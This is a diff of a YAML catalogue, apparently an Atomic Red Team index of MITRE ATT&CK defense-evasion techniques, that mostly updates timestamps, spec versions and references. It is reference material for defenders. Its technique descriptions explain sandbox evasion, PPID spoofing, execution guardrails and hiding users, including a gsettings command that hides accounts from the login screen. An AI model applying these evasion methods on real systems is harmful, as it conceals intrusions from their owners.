           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -9161,8 +9269,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1218.012:
@@ -9218,7 +9324,7 @@ defense-evasion:
         not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
         Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
         Nick Tyrer GitHub) "
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:35:28.221Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Verclsid
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -9242,7 +9348,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.010:
     technique:
@@ -9333,40 +9438,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.010
     atomic_tests: []
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -9378,6 +9454,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -9388,8 +9468,14 @@ defense-evasion:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -9399,9 +9485,28 @@ defense-evasion:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1218.005:
     technique:
@@ -9454,7 +9559,7 @@ defense-evasion:
       - source_name: LOLBAS Mshta
         url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
         description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T20:38:28.802Z'
       name: 'Signed Binary Proxy Execution: Mshta'
       description: "Adversaries may abuse mshta.exe to proxy execution of malicious
         .hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -9492,68 +9597,72 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.005
     atomic_tests: []
   T1480:
     technique:
+      modified: '2024-06-07T14:30:23.491Z'
+      name: Execution Guardrails
+      description: |-
+        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+        Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Nick Carr, Mandiant
+      x_mitre_deprecated: false
+      x_mitre_detection: Detecting the use of guardrails may be difficult depending
+        on the implementation. Monitoring for suspicious processes being spawned that
+        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+        especially in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Nick Carr, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      x_mitre_defense_bypassed:
+      - Anti-virus
+      - Host Forensic Analysis
+      - Signature-based Detection
+      - Static File Analysis
       type: attack-pattern
       id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
       created: '2019-01-31T02:10:08.261Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1480
         url: https://attack.mitre.org/techniques/T1480
+        external_id: T1480
       - source_name: FireEye Outlook Dec 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
         description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
           the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
           June 23, 2020.'
+        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+      - source_name: Trellix-Qakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved June 7, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: FireEye Kevin Mandia Guardrails
-        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
         description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
           U.S. malware is more restrained than adversaries'. Retrieved January 17,
           2019.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
-        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Execution Guardrails
-      x_mitre_detection: Detecting the use of guardrails may be difficult depending
-        on the implementation. Monitoring for suspicious processes being spawned that
-        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
-        especially in a short period of time, may aid in detection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Command: Command Execution'
-      x_mitre_defense_bypassed:
-      - Anti-virus
-      - Host Forensic Analysis
-      - Signature-based Detection
-      - Static File Analysis
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.001:
     technique:
@@ -9611,7 +9720,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1205.001:
@@ -9637,7 +9745,7 @@ defense-evasion:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -9662,8 +9770,6 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.012:
     technique:
@@ -9724,7 +9830,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.002:
     technique:
@@ -9797,7 +9902,7 @@ defense-evasion:
         <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>).(Citation:
         Hide GDM User Accounts) Display Managers are not anchored to specific distributions
         and may be changed by a user or adversary."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T02:31:01.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Hide Artifacts: Hidden Users'
       x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -9826,7 +9931,6 @@ defense-evasion:
       - 'User Account: User Account Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.002
     atomic_tests:
     - name: Create Hidden User using UniqueID < 500
@@ -9933,11 +10037,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.940Z'
       name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
@@ -10022,7 +10125,6 @@ defense-evasion:
         url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1562.003
     atomic_tests:
     - name: Disable history collection
@@ -10062,7 +10164,7 @@ defense-evasion:
         name: manual
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -10137,45 +10239,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -10199,6 +10266,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -10209,9 +10279,14 @@ defense-evasion:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -10221,8 +10296,35 @@ defense-evasion:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1134.004:
     technique:
@@ -10279,7 +10381,7 @@ defense-evasion:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -10304,7 +10406,6 @@ defense-evasion:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1055.014:
@@ -10375,7 +10476,7 @@ defense-evasion:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -10402,11 +10503,10 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -10460,7 +10560,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1574.013:
     technique:
@@ -10496,7 +10595,7 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -10522,8 +10621,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.004:
     technique:
@@ -10549,7 +10646,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -10571,8 +10668,6 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1218.001:
     technique:
@@ -10638,12 +10733,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.001
     atomic_tests: []
   T1070.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-13T17:15:56.948Z'
       name: 'Indicator Removal on Host: Network Share Connection Removal'
       description: 'Adversaries may remove share connections that are no longer useful
         in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -10698,7 +10792,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.005
     atomic_tests: []
   T1562.001:
@@ -10846,7 +10939,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.001
     atomic_tests:
     - name: Disable Carbon Black Response
@@ -10987,7 +11079,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:47.635Z'
       name: Modify System Image
       description: |-
         Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -11022,8 +11114,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574:
     technique:
@@ -11089,7 +11179,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.005:
     technique:
@@ -11115,7 +11204,7 @@ defense-evasion:
         Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
 
         A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:07:48.062Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Indicator Removal from Tools
       x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -11140,11 +11229,10 @@ defense-evasion:
       - Signature-based detection
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -11161,7 +11249,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
